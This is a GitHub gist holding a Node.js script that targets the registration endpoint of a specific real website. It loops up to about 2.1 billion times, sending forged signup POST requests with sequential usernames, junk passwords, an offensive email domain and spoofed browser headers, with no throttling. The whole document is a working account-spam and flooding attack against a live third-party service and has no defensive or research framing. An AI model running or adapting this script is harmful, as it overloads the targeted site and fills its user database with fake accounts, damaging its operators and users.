Skip to content

Instantly share code, notes, and snippets.

@fzorb
Created June 7, 2022 05:51
Show Gist options
  • Save fzorb/86e184e7c6528fedaedf7861bb357798 to your computer and use it in GitHub Desktop.
Save fzorb/86e184e7c6528fedaedf7861bb357798 to your computer and use it in GitHub Desktop.
const fetch = (...args) => import('node-fetch').then(({default: fetch}) => fetch(...args));
for(let i = 0; i < 2147483647; i++){
fetch("https://www.detrimo.com/account/register/submit.php", {
"headers": {
"accept": "*/*",
"accept-language": "tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7",
"content-type": "application/x-www-form-urlencoded; charset=UTF-8",
"sec-ch-ua": "\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"102\", \"Google Chrome\";v=\"102\"",
"sec-ch-ua-mobile": "?0",
"sec-ch-ua-platform": "\"Windows\"",
"sec-fetch-dest": "empty",
"sec-fetch-mode": "cors",
"sec-fetch-site": "same-origin",
"x-requested-with": "XMLHttpRequest"
},
"referrer": "https://www.detrimo.com/account/register/",
"referrerPolicy": "strict-origin-when-cross-origin",
"body": "username=aaa"+i+"&pw1=https%3A%2F%2Fwww.detrimo.com%2Faccount%2Fregister%2F&pw2=https%3A%2F%2Fwww.detrimo.com%2Faccount%2Fregister%2F&email=naax%40nazi.com",
"method": "POST",
"mode": "cors",
"credentials": "include"
});
console.log("Request No. " + i);
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment